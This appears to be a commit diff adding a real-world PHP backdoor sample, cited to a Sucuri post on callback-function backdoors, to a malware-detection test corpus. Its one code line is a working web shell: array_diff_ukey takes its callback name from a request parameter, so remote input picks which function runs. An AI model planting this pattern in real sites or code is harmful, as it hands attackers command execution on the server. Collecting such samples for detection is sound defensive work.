diff options
Diffstat (limited to 'data/samples/real/sucuri_2014_04.php')
| -rw-r--r-- | data/samples/real/sucuri_2014_04.php | 3 |
1 files changed, 3 insertions, 0 deletions
diff --git a/data/samples/real/sucuri_2014_04.php b/data/samples/real/sucuri_2014_04.php new file mode 100644 index 0000000..64bfa07 --- /dev/null +++ b/data/samples/real/sucuri_2014_04.php | |||
| @@ -0,0 +1,3 @@ | |||
| 1 | <?php | ||
| 2 | /* https://blog.sucuri.net/2014/04/php-callback-functions-another-way-to-hide-backdoors.html */ | ||
| 3 | @array_diff_ukey(@array((string)$_REQUEST['password']=>1), @array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']); | ||
